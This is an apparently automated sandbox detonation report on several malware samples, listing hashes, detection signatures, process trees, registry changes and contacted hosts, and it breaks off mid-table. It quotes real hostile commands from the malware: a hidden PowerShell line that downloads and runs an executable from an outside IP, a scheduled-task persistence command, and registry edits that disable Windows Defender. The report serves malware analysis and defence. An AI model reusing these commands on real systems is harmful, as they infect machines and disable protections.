SHA1 0798941aaf7a53a11ea9ed589752890aee069729
SHA256 224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA512 2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

Analysis: behavioral25

Detonation Overview

Submitted

2025-02-26 23:45

Reported

2025-02-26 23:48

Platform

win7-20240903-en

Max time kernel

122s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe"

Signatures

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Healer

dropper healer

Healer family

healer

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Users\Admin\AppData\Local\TempCRO9ASROQVPIKTDO3OG3A7VVNYUYHX3T.EXE N/A

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\TempCRO9ASROQVPIKTDO3OG3A7VVNYUYHX3T.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\TempCRO9ASROQVPIKTDO3OG3A7VVNYUYHX3T.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\TempCRO9ASROQVPIKTDO3OG3A7VVNYUYHX3T.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\TempCRO9ASROQVPIKTDO3OG3A7VVNYUYHX3T.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\TempCRO9ASROQVPIKTDO3OG3A7VVNYUYHX3T.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\TempCRO9ASROQVPIKTDO3OG3A7VVNYUYHX3T.EXE N/A

Modifies Windows Defender TamperProtection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\TempCRO9ASROQVPIKTDO3OG3A7VVNYUYHX3T.EXE N/A

Modifies Windows Defender notification settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications C:\Users\Admin\AppData\Local\TempCRO9ASROQVPIKTDO3OG3A7VVNYUYHX3T.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" C:\Users\Admin\AppData\Local\TempCRO9ASROQVPIKTDO3OG3A7VVNYUYHX3T.EXE N/A

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\TempCRO9ASROQVPIKTDO3OG3A7VVNYUYHX3T.EXE N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\TempCRO9ASROQVPIKTDO3OG3A7VVNYUYHX3T.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\TempCRO9ASROQVPIKTDO3OG3A7VVNYUYHX3T.EXE N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\TempCRO9ASROQVPIKTDO3OG3A7VVNYUYHX3T.EXE N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine C:\Users\Admin\AppData\Local\TempCRO9ASROQVPIKTDO3OG3A7VVNYUYHX3T.EXE N/A

Windows security modification

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\TempCRO9ASROQVPIKTDO3OG3A7VVNYUYHX3T.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\TempCRO9ASROQVPIKTDO3OG3A7VVNYUYHX3T.EXE N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\TempCRO9ASROQVPIKTDO3OG3A7VVNYUYHX3T.EXE N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\TempCRO9ASROQVPIKTDO3OG3A7VVNYUYHX3T.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\TempCRO9ASROQVPIKTDO3OG3A7VVNYUYHX3T.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1660 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe C:\Windows\SysWOW64\mshta.exe
PID 1660 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe C:\Windows\SysWOW64\mshta.exe
PID 1660 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe C:\Windows\SysWOW64\mshta.exe
PID 1660 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe C:\Windows\SysWOW64\mshta.exe
PID 2068 wrote to memory of 2336 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2068 wrote to memory of 2336 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2068 wrote to memory of 2336 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2068 wrote to memory of 2336 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1288 wrote to memory of 2376 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1288 wrote to memory of 2376 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1288 wrote to memory of 2376 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1288 wrote to memory of 2376 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2376 wrote to memory of 2796 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempCRO9ASROQVPIKTDO3OG3A7VVNYUYHX3T.EXE
PID 2376 wrote to memory of 2796 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempCRO9ASROQVPIKTDO3OG3A7VVNYUYHX3T.EXE
PID 2376 wrote to memory of 2796 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempCRO9ASROQVPIKTDO3OG3A7VVNYUYHX3T.EXE
PID 2376 wrote to memory of 2796 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempCRO9ASROQVPIKTDO3OG3A7VVNYUYHX3T.EXE

Processes

C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn Mg4E3mahjv0 /tr "mshta C:\Users\Admin\AppData\Local\Temp\Hyfs1QKvc.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\Hyfs1QKvc.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn Mg4E3mahjv0 /tr "mshta C:\Users\Admin\AppData\Local\Temp\Hyfs1QKvc.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'CRO9ASROQVPIKTDO3OG3A7VVNYUYHX3T.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\TempCRO9ASROQVPIKTDO3OG3A7VVNYUYHX3T.EXE

"C:\Users\Admin\AppData\Local\TempCRO9ASROQVPIKTDO3OG3A7VVNYUYHX3T.EXE"

Network

Country Destination Domain Proto
RU 185.215.113.16:80 185.215.113.16 tcp

Files

C:\Users\Admin\AppData\Local\Temp\Hyfs1QKvc.hta

MD5 25cf786a01c7653df08c672e1e83d9e9
SHA1 f823c52c76b1bb4a0005c33210c3f7ce25021f80
SHA256 5d72ee151a7c023b9ba8ebddd35fc0263328a6e07e7c93fef17c33af9f8225f3
SHA512 1317c98629e99cb8dc495ff74338c2c9f2bc07089781475af2b2246afcc210fd7756b6930a0096326f9f777616e1917d59a6df86ed8afdde032e65d40d1ab16a

\Users\Admin\AppData\Local\TempCRO9ASROQVPIKTDO3OG3A7VVNYUYHX3T.EXE

MD5 03a574d64f0e62c5e117a5f5acf137e4
SHA1 93ba2b5bdac91342c9eeaeaf3e44cc1793ee6d90
SHA256 dcc540b3c86a167bb0cf71e8d4598f7566fe0f625d64ffe7a37f0d5f502be747
SHA512 d1b76d82c522ccb157dcd5155011619b36baf3516cf08cb6bc98fb9bc009230e5c53d77f5d8adc0e85dde678b4b3542823919ee6490533df8250078caca1b9b1

memory/2376-14-0x00000000064E0000-0x0000000006932000-memory.dmp

memory/2796-15-0x0000000001360000-0x00000000017B2000-memory.dmp

memory/2376-13-0x00000000064E0000-0x0000000006932000-memory.dmp

memory/2796-16-0x0000000001360000-0x00000000017B2000-memory.dmp

memory/2796-17-0x0000000001360000-0x00000000017B2000-memory.dmp

memory/2796-20-0x0000000001360000-0x00000000017B2000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2025-02-26 23:45

Reported

2025-02-26 23:48

Platform

win7-20240903-en

Max time kernel

121s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe"

Signatures

Reads user/profile data of local email clients

spyware stealer

Checks installed software on the system

discovery

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 548 set thread context of 1792 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe N/A

Modifies system certificate store

defense_evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 548 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe
PID 548 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe
PID 548 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe
PID 548 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe
PID 548 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe
PID 548 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe
PID 548 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe
PID 548 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe
PID 548 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe
PID 548 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe
PID 548 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Windows\SysWOW64\WerFault.exe
PID 548 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Windows\SysWOW64\WerFault.exe
PID 548 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Windows\SysWOW64\WerFault.exe
PID 548 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Windows\SysWOW64\WerFault.exe

Processes

C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 548 -s 504

Network

Country Destination Domain Proto
US 8.8.8.8:53 privileggoe.live udp
US 8.8.8.8:53 foresctwhispers.top udp
US 104.21.64.1:443 foresctwhispers.top tcp
US 8.8.8.8:53 tracnquilforest.life udp
US 172.67.164.79:443 tracnquilforest.life tcp
US 8.8.8.8:53 presentymusse.world udp
US 8.8.8.8:53 deaddereaste.today udp
US 8.8.8.8:53 subawhipnator.life udp
US 8.8.8.8:53 boltetuurked.digital udp
US 8.8.8.8:53 pastedeputten.life udp
US 8.8.8.8:53 steamcommunity.com udp
FR 2.18.131.137:443 steamcommunity.com tcp
US 8.8.8.8:53 disobilittyhell.live udp
US 172.67.137.158:443 disobilittyhell.live tcp
US 172.67.137.158:443 disobilittyhell.live tcp
US 172.67.137.158:443 disobilittyhell.live tcp

Files

memory/548-0-0x00000000745DE000-0x00000000745DF000-memory.dmp

memory/548-1-0x0000000000230000-0x0000000000298000-memory.dmp

memory/1792-3-0x0000000000400000-0x000000000045E000-memory.dmp

memory/1792-5-0x0000000000400000-0x000000000045E000-memory.dmp

memory/1792-12-0x0000000000400000-0x000000000045E000-memory.dmp

memory/1792-10-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/1792-9-0x0000000000400000-0x000000000045E000-memory.dmp

memory/1792-14-0x0000000000400000-0x000000000045E000-memory.dmp

memory/1792-8-0x0000000000400000-0x000000000045E000-memory.dmp

memory/1792-7-0x0000000000400000-0x000000000045E000-memory.dmp

memory/548-15-0x00000000745D0000-0x0000000074CBE000-memory.dmp

memory/1792-16-0x0000000000400000-0x000000000045E000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 83142242e97b8953c386f988aa694e4a
SHA1 833ed12fc15b356136dcdd27c61a50f59c5c7d50
SHA256 d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
SHA512 bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

C:\Users\Admin\AppData\Local\Temp\TarE27A.tmp

MD5 109cab5505f5e065b63d01361467a83b
SHA1 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc
SHA256 ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673
SHA512 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc

memory/1792-54-0x0000000000400000-0x000000000045E000-memory.dmp

memory/548-55-0x00000000745D0000-0x0000000074CBE000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2025-02-26 23:45

Reported

2025-02-26 23:48

Platform

win7-20240903-en

Max time kernel

144s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1848 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
